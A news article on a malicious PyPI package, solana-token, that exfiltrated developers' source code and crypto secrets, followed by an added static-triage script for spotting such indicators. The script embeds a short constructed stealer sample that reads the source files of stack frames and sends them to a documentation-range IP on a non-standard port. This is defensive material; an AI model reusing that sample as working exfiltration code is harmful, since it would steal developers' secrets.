
The ReversingLabs research team has uncovered yet another software supply chain attack targeting the cryptocurrency ecosystem, this time involving a rogue Python package called solana-token. Posing as a legitimate utility for Solana developers, the package was discovered on the Python Package Index (PyPI) and had been downloaded more than 600 times before its takedown.
Solana, a popular blockchain platform renowned for high-speed, low-fee transactions, continues to attract interest from both developers and threat actors. The malicious solana-token package exploited this popularity by masquerading as a tool for developers working on Solana-based applications.
“While the PyPI landing page for the package did not include a description, the package name and functions suggest that developers looking to create their own blockchains were the likely targets,” the ReversingLabs team wrote.
The package's code carried telltale signs of malicious intent, including:
- Hardcoded IP addresses used to exfiltrate stolen data
- Outbound communications to non-standard network ports
- Code that reads local files, a behavior often seen in infostealers
One particularly insidious method in the package “scanned the Python execution stack, then copied and exfiltrated source code contained in all the files in the execution chain to a remote server.”
The objective is to steal developer secrets and hardcoded crypto credentials, which are often left unprotected in source code. Such data could give attackers unauthorized access to cryptocurrency wallets and other critical infrastructure.
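The indicators listed above (hardcoded IP addresses, non-standard ports, local file reads, and execution-stack introspection) are all visible in source and can be triaged statically before a package is ever installed. The following script is an added example written for this article; it is not code from the ReversingLabs report or from the solana-token package. It parses a Python file with the standard-library `ast` module and flags each indicator. The two sample inputs are constructed for the demonstration, and the IP address in the malicious sample comes from the 203.0.113.0/24 documentation range, not from the report.

```python
"""Static triage of Python source for infostealer indicators (added example)."""
import ast
import re
from typing import List, NamedTuple

# Ports a package talking to an ordinary web API would use; anything else is flagged.
STANDARD_PORTS = {80, 443}

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_PORT_RE = re.compile(r"^[a-z]+://[^/:\s]+:(\d{2,5})(?:/|$)", re.IGNORECASE)

# Calls that walk the execution stack or hand back frame objects.
STACK_INSPECTION = {
    ("inspect", "stack"),
    ("inspect", "currentframe"),
    ("inspect", "getouterframes"),
    ("sys", "_getframe"),
    ("traceback", "extract_stack"),
}


class Finding(NamedTuple):
    kind: str
    lineno: int
    detail: str


def _dotted(node: ast.AST):
    """Return ('module', 'attr') for an Attribute over a bare Name, else None."""
    if isinstance(node, ast.Attribute) and isinstance(node.value, ast.Name):
        return (node.value.id, node.attr)
    return None


def _is_read_mode(call: ast.Call) -> bool:
    """open() defaults to read; only an explicit write/append/create mode is excluded."""
    if len(call.args) < 2:
        return True
    mode = call.args[1]
    if isinstance(mode, ast.Constant) and isinstance(mode.value, str):
        return not any(c in mode.value for c in "wax")
    return True


def triage(source: str) -> List[Finding]:
    """Walk the AST once and collect indicator hits, sorted for stable output."""
    tree = ast.parse(source)
    findings: List[Finding] = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            # 1. hardcoded IPv4 literals, and explicit non-standard ports inside URLs
            if IPV4_RE.search(node.value):
                findings.append(Finding("hardcoded_ip", node.lineno, node.value))
            m = URL_PORT_RE.match(node.value)
            if m and int(m.group(1)) not in STANDARD_PORTS:
                findings.append(Finding("nonstandard_port", node.lineno, node.value))
        elif isinstance(node, ast.Tuple) and len(node.elts) == 2:
            # 2. (host, port) address tuples as passed to socket.connect()/sendto()
            host, port = node.elts
            if (isinstance(host, ast.Constant) and isinstance(host.value, str)
                    and isinstance(port, ast.Constant) and isinstance(port.value, int)
                    and port.value not in STANDARD_PORTS):
                findings.append(Finding("nonstandard_port", node.lineno,
                                        f"{host.value}:{port.value}"))
        elif isinstance(node, ast.Call):
            # 3. execution-stack introspection and local file reads
            name = _dotted(node.func)
            if name in STACK_INSPECTION:
                findings.append(Finding("stack_inspection", node.lineno, ".".join(name)))
            elif isinstance(node.func, ast.Name) and node.func.id == "open" and _is_read_mode(node):
                findings.append(Finding("file_read", node.lineno, "open()"))
        elif isinstance(node, ast.Attribute) and node.attr in {"co_filename", "filename"}:
            # 4. pulling source paths off frame / code objects
            findings.append(Finding("frame_filename", node.lineno, node.attr))

    # '.filename' is common on unrelated objects; keep it only when the file also
    # walks the stack. 'co_filename' is specific to code objects and always kept.
    has_stack = any(f.kind == "stack_inspection" for f in findings)
    findings = [f for f in findings
                if not (f.kind == "frame_filename" and f.detail == "filename" and not has_stack)]
    return sorted(findings)


# Constructed sample mimicking the described behaviour: enumerate frames, read the
# source file of each, ship everything to a hardcoded address on an odd port.
MALICIOUS_SAMPLE = '''
import inspect, socket

def harvest():
    blobs = []
    for frame in inspect.stack():
        with open(frame.filename, "r") as fh:
            blobs.append(fh.read())
    s = socket.socket()
    s.connect(("203.0.113.7", 8448))
    s.sendall("\\n".join(blobs).encode())
'''

# Constructed benign sample: an ordinary HTTPS API call, no indicators expected.
BENIGN_SAMPLE = '''
import requests

def price(symbol):
    r = requests.get("https://api.example.com/v1/price", params={"s": symbol})
    return r.json()
'''

if __name__ == "__main__":
    for f in triage(MALICIOUS_SAMPLE):
        print(f"line {f.lineno:>3}  {f.kind:<17} {f.detail}")
```

This is a triage aid, not a verdict: legitimate networking code will trip the port and IP rules, and any one hit is weak evidence on its own. The combination the report describes (stack walking plus file reads plus a hardcoded remote endpoint) in a package whose stated purpose needs none of them is what should send a reviewer to read the code by hand.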
This isn't the first time this package name has surfaced. A previous package with the same name was published to PyPI and removed in 2024. Because that earlier removal was carried out by the package author rather than by PyPI security staff, the name became available for registration again.
“That left the package name available for re-use… suggesting the same malicious actors that pulled down the earlier solana-token package may be behind the new malicious version,” the report noted.